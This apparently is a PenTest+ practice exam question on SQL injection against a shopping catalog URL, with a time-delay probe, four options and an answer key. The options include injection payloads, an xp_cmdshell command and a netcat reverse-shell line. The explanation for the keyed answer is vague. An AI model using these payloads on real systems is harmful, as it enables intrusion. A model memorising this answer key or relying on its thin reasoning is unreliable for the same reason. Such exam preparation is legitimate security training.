CompTIA PenTest+ (PT0-002) — Question 128

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

http://company.com/catalog.asp?productid=22

The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

http://company.com/catalog.asp?productid=22;WAITFOR DELAY'00:00:05'

Which of the following should the penetration tester attempt NEXT?

Answer options

• A. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'
• B. http://company.com/catalog.asp?productid=22' OR 1=1 --
• C. http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 --
• D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

Correct answer: B

Explanation

The correct answer is B because it attempts a classic SQL injection by using the 'OR 1=1' statement, which is effective for bypassing authentication or retrieving data. The other options involve different types of injections or command executions that may not be applicable based on the context of the discovered delay in the URL modification.